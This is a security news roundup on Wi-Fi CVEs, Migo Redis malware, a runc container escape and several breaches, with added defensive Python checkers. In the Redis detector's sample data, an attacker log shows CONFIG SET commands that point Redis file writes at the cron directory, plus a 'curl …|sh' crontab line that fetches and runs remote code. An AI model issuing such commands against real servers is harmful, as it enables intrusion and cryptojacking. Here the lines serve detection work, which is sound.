Security Leftovers
-
Hacker News ☛ New Wi-Fi Vulnerabilities Expose Android and Linux Devices to Hackers
Cybersecurity researchers have identified two authentication bypass flaws in open-source Wi-Fi software found in Android, Linux, and ChromeOS devices that could trick users into joining a malicious clone of a legitimate network or allow an attacker to join a trusted network without a password.
The vulnerabilities, tracked as CVE-2023-52160 and CVE-2023-52161, have been discovered following a security evaluation of wpa_supplicant and Intel's iNet Wireless Daemon (IWD), respectively.
The flaws "allow attackers to trick victims into connecting to malicious clones of trusted networks and intercept their traffic, and join otherwise secure networks without needing the password," Top10VPN said in new research conducted in collaboration with Mathy Vanhoef, who has previously uncovered Wi-Fi attacks like KRACK, DragonBlood, and TunnelCrack.
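The wpa_supplicant side of this (CVE-2023-52160) only bites when a tunnelled-EAP profile never verifies the server certificate, which is what lets a cloned access point stand in for the real one. The checker below is an added example, not code from the page or from the wpa_supplicant project: it parses `network={...}` blocks from a constructed wpa_supplicant.conf and flags PEAP/TTLS/FAST profiles that have no `ca_cert`. The SSIDs, identities and paths in the sample are made up.

```python
"""Flag wpa_supplicant network blocks that use PEAP/TTLS/FAST without a
ca_cert, i.e. profiles that do not pin the RADIUS server and so can be
lured to a cloned network.  Added example; the config text is constructed."""
import re

SAMPLE_CONF = """\
network={
    ssid="corp-wifi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="corp-wifi-pinned"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="bob"
    password="hunter2"
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    domain_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="home"
    key_mgmt=WPA-PSK
    psk="correct horse battery staple"
}
"""

# One network={ ... } block; bodies never contain a bare '}' so non-greedy is safe.
BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)

# EAP methods that tunnel an inner authentication through a server-authenticated TLS channel.
TUNNELLED_EAP = {"PEAP", "TTLS", "FAST"}


def parse_networks(conf):
    """Return a list of dicts, one per network block, with quotes stripped from values."""
    nets = []
    for body in BLOCK_RE.findall(conf):
        fields = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip().strip('"')
        nets.append(fields)
    return nets


def weak_eap_networks(conf):
    """SSIDs of tunnelled-EAP profiles that do not configure a ca_cert."""
    weak = []
    for net in parse_networks(conf):
        if net.get("eap", "").upper() in TUNNELLED_EAP and not net.get("ca_cert"):
            weak.append(net.get("ssid", "<no ssid>"))
    return weak


if __name__ == "__main__":
    for ssid in weak_eap_networks(SAMPLE_CONF):
        print(f"unpinned tunnelled-EAP profile: {ssid}")
```

Running this on a real `/etc/wpa_supplicant/wpa_supplicant.conf` (or a NetworkManager-generated one) lists profiles to fix; the fix is to add `ca_cert` together with `domain_match` or `domain_suffix_match`, which is also what the published advisory recommends, rather than only updating the package.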
-
Gray Dot Media Group ☛ New Linux Malware “Migo” Exploits Redis for Cryptojacking, Disables Security [Ed: The problem here is not Linux but Redis; that's like blaming Windows for Photoshop.]
New “Migo” malware targets Linux servers, exploiting Redis for cryptojacking. Using a user-mode rootkit, it hides its activity, making detection difficult. Secure your Redis servers and stay alert!
A sophisticated Linux malware campaign has been discovered targeting Redis, a popular data store system, to gain initial access using “System Weakening Commands,” revealed Cado Security Labs.
-
New Mingo Malware Attacking Linux Redis Servers To Mine Cryptocurrency [Ed: Again, the issue here is not Linux]
The campaign employed many Redis system-weakening commands to potentially disable data store security features that could hinder their initial attempts at access.
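Both Migo write-ups above describe the initial-access stage as a series of Redis "system-weakening" commands issued over the exposed port. The detector below is an added example, not code from Cado Security, the page, or the Redis project: it parses constructed `MONITOR`-style lines and flags `CONFIG SET` of settings that disable protections or redirect file writes, plus a crontab-looking `SET` payload. The exact settings watched (`protected-mode`, `replica-read-only`, the fsync options, `dir`/`dbfilename`) are an assumption drawn from commonly abused Redis settings; the page does not enumerate them.

```python
"""Scan Redis MONITOR output for configuration-weakening commands.
Added example; the MONITOR lines are constructed and the watched settings
are an assumption, not a list taken from the Migo reports."""
import re
import shlex

SAMPLE_MONITOR = """\
1708600001.000001 [0 10.0.0.7:40000] "GET" "session:42"
1708600002.000002 [0 203.0.113.9:51000] "CONFIG" "SET" "protected-mode" "no"
1708600003.000003 [0 203.0.113.9:51000] "CONFIG" "SET" "replica-read-only" "no"
1708600004.000004 [0 203.0.113.9:51000] "CONFIG" "SET" "dir" "/var/spool/cron"
1708600005.000005 [0 203.0.113.9:51000] "CONFIG" "SET" "dbfilename" "root"
1708600006.000006 [0 203.0.113.9:51000] "SET" "x" "\\n* * * * * curl http://203.0.113.9/m|sh\\n"
1708600007.000007 [0 203.0.113.9:51000] "SAVE"
1708600008.000008 [0 10.0.0.7:40000] "CONFIG" "GET" "maxmemory"
"""

# Settings whose change disables a protection or steers the RDB/AOF file write.
WEAKENING_SETTINGS = {
    "protected-mode", "replica-read-only", "dir", "dbfilename",
    "aof-rewrite-incremental-fsync", "rdb-save-incremental-fsync",
}
# Commands that pull in attacker data or code directly.
WEAKENING_COMMANDS = {"SLAVEOF", "REPLICAOF", "MODULE", "DEBUG"}

# MONITOR format: <timestamp> [<db> <addr:port>] "CMD" "arg" ...
LINE_RE = re.compile(r"^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<cmd>.*)$")


def parse_line(line):
    """Split one MONITOR line into timestamp, client and argument list."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"ts": m.group("ts"), "client": m.group("client"),
            "args": shlex.split(m.group("cmd"))}


def classify(args):
    """Return a short reason if the command weakens the server, else None."""
    if not args:
        return None
    cmd = args[0].upper()
    if cmd == "CONFIG" and len(args) >= 3 and args[1].upper() == "SET":
        if args[2].lower() in WEAKENING_SETTINGS:
            return f"CONFIG SET {args[2].lower()}"
    if cmd in WEAKENING_COMMANDS:
        return cmd
    if cmd == "SET" and len(args) >= 3 and "* * * * *" in args[2]:
        return "crontab-looking payload"
    return None


def find_weakening(monitor_text):
    """(client, reason) for every flagged command, in order of appearance."""
    hits = []
    for line in monitor_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reason = classify(rec["args"])
        if reason:
            hits.append((rec["client"], reason))
    return hits


if __name__ == "__main__":
    for client, reason in find_weakening(SAMPLE_MONITOR):
        print(f"{client}: {reason}")
```

In practice the same logic is easier to run against a Redis ACL log or network capture than against `MONITOR`, which is expensive on a busy instance; the preventive counterpart is to bind Redis to a private interface, require authentication, and `rename-command CONFIG ""` (or restrict it via ACL) so the weakening step fails outright.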
-
LWN ☛ A turning point for CVE numbers
The Common Vulnerabilities and Exposures (CVE) system was set up in 1999 as a way to refer unambiguously to known vulnerabilities in software. That system has found itself under increasing strain over the years, and numerous projects have responded by trying to assert greater control over how CVE numbers are assigned for their code. On February 13, though, a big shoe dropped when the Linux kernel project announced that it, too, was taking control of CVE-number assignments. As is often the case, though, the kernel developers are taking a different approach to vulnerabilities, with possible implications for the CVE system as a whole.
-
LWN ☛ Another runc container breakout
Once again, runc—a tool for spawning and running OCI containers—is drawing attention due to a high severity container breakout attack. This vulnerability is interesting for several reasons: its potential for widespread impact, the continued difficulty in actually containing containers, the dangers of running containers as a privileged user, and the fact that this vulnerability is made possible in part by a response to a previous container breakout flaw in runc.
The runc utility is the most popular (but not only) implementation of the Open Container Initiative (OCI) container runtime specification and can be used to handle the low-level operations of running containers for container management and orchestration tools like Docker, Podman, Rancher, containerd, Kubernetes, and many others. Runc also has had its share of vulnerabilities, the most recent of which is CVE-2024-21626 — a flaw that could allow the attacker to completely escape the container and take control of the host system. The fix is shipped with runc 1.1.12, with versions 1.0.0-rc93 through 1.1.11 affected by the vulnerability. Distributors are backporting the fix and shipping updates as necessary.
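The affected range given above spans a release candidate (1.0.0-rc93) through a final release (1.1.11), so a naive string comparison gets the boundary wrong. The helper below is an added example, not runc project code: it parses a `runc --version` banner (the sample output is constructed) and decides whether the version falls inside the stated CVE-2024-21626 range, treating pre-releases as older than the final release of the same number.

```python
"""Decide whether a runc version is in the CVE-2024-21626 affected range
(1.0.0-rc93 through 1.1.11, fixed in 1.1.12) as stated in the LWN summary.
Added example; the sample `runc --version` output is constructed."""
import re

VERSION_RE = re.compile(r"^runc version (\S+)", re.M)
SEMVER_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-rc(\d+))?")


def parse_version(text):
    """'1.1.11' -> (1, 1, 11, inf); '1.0.0-rc93' -> (1, 0, 0, 93).

    The final release gets rc=inf so that every rcN of the same number sorts
    before it, matching how the affected range is stated."""
    m = SEMVER_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised runc version: {text!r}")
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), int(rc) if rc else float("inf"))


FIRST_AFFECTED = parse_version("1.0.0-rc93")
FIRST_FIXED = parse_version("1.1.12")


def is_affected(version):
    """True if version is in [1.0.0-rc93, 1.1.12) by upstream version number alone."""
    return FIRST_AFFECTED <= parse_version(version) < FIRST_FIXED


def check_runc_output(banner):
    """Parse `runc --version` output and return (version string, affected?)."""
    m = VERSION_RE.search(banner)
    if not m:
        raise ValueError("no 'runc version' line found")
    version = m.group(1)
    return version, is_affected(version)


SAMPLE_OUTPUT = """\
runc version 1.1.11
spec: 1.0.2-dev
"""

if __name__ == "__main__":
    version, affected = check_runc_output(SAMPLE_OUTPUT)
    print(f"runc {version}: {'AFFECTED' if affected else 'not in affected range'}")
```

As the summary notes, distributors backport the fix, so a distro package reporting 1.1.11 may already carry it; treat a hit from this check as "confirm with the vendor advisory or changelog", not as a verdict on its own.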
-
Data Breaches ☛ HHS’ Office for Civil Rights Settles Second Ever Ransomware Cyber-Attack for $40,000 and a Corrective Action Plan with OCR Monitoring
Ransomware and hacking are the primary cyber-threats in health care. Over the past five years, there has been a 256% increase in large breaches reported to OCR involving hacking and a 264% increase in ransomware. In 2023, hacking accounted for 79% of the large breaches reported to OCR. The large breaches reported in 2023 affected over 134 million individuals, a 141% increase from 2022.
-
Information Security Media Group, Corporation ☛ Hack at Services Firm Hits 2.4 Million Eye Doctor Patients
Medical Management Resource Group, which does business as American Vision Partners, works with – and “shares” a management system, IT and infrastructure with – 12 practices, according to its website. The incident involved the hack of a network server and affected more than 2.35 million individuals, the company said in a Feb. 6 report to the Department of Health and Human Services.
The Tempe, Arizona-based firm said that on Nov. 14 it had detected unauthorized activity on certain parts of its network. MMRG said it had promptly taken steps to contain the incident, including isolating the affected system and engaging assistance from outside cybersecurity firms.
-
National Law Review US ☛ Data Breach Putative Class Action Questions Whether Broker Was Swift Enough in Notice and Response
While America was tuned into the big game, one California insurance broker faced its own treacherous showdown in the form of a putative class action filed on February 8, 2024 stemming from a data breach. With cyber incidents still on the rise, this is a story we know all too well: an unauthorized third party gains access to personally identifiable information, the company eventually detects the threat actor and leadership must decide how to respond. Once notifications to the public go out, the individuals impacted often file suit to recover for their alleged harm.
-
Secureworks ☛ Unpicking LockBit — 22 Cases of Affiliate Tradecraft [Ed: Windows TCO]
The GOLD MYSTIC threat group has operated the LockBit name-and-shame ransomware-as-a-service (RaaS) scheme since mid-2019, exploiting unauthorized access to thousands of organizations to deploy ransomware and steal data to facilitate the extortion of victims. At approximately 4:00 pm EST on February 19, 2024, the UK's National Crime Agency (NCA) and U.S. Federal Bureau of Investigation (FBI), in conjunction with international law enforcement partners, took disruptive action against the infrastructure used by the LockBit RaaS operation.
Secureworks® incident responders investigated 22 compromises featuring LockBit ransomware from July 2020 through January 2024. These investigations revealed the tactics, techniques, and procedures (TTPs) that LockBit affiliates have used in their intrusions. The complexity of operations varies from manual encryption of individual hosts to automated ransomware deployments from domain controllers. In some incidents, ransomware is not deployed at all. Instead, affiliates rely on data theft alone to extort victims. LockBit's evolution includes targeting VMware ESXi hosts to encrypt virtual machines, which can have a devastating impact on organizations that rely heavily on virtualized infrastructure. As the LockBit brand has grown in stature, copycat cybercriminals have sought to exploit the name for their own ransomware operations or other extortion threats.
-
Data Breaches ☛ Reward Offers for Information on LockBit Leaders and Designating Affiliates [Ed: Windows TCO]
Since January 2020, LockBit actors have executed over 2,000 attacks against victims in the United States, and around the world, causing costly disruptions to operations and the destruction or exfiltration of sensitive information. More than $144 million in ransom payments have been made to recover from LockBit ransomware events.
-
NJ Addiction Centers Victim Of Data Breach
Maryville, a nonprofit addiction agency, is offering credit monitoring services for those who may have had their Social Security numbers and other private details exposed as a result of the incident, according to spokesman Bill Crowe.
The centers affected are in Williamstown, Turnersville, Pemberton, Vineland and Franklinville.
"We have no indication that any information has been misused for identity theft," the agency said.
-
Data Breaches ☛ Change Healthcare responding to cyberattack; few details known at this point
Early yesterday, Change Healthcare reported that they were experiencing enterprise-wide connectivity issues. They didn’t call it a cyberattack at that point, but by mid-day, their status reports were indicating that they were experiencing “a network interruption related to a cyber security issue.” A few hours later, they added a statement, “Once we became aware of the outside threat, in the interest of protecting our partners and patients, we took immediate action to disconnect our systems to prevent further impact. The disruption is expected to last at least through the day. We will provide updates as more information becomes available.”
Change Healthcare has issued updates every few hours since then. As of this morning, their updates no longer say the disruption is expected to last at least through the day. Now it offers no prediction of how long the disruption will last and merely states, “We will provide updates as more information becomes available.”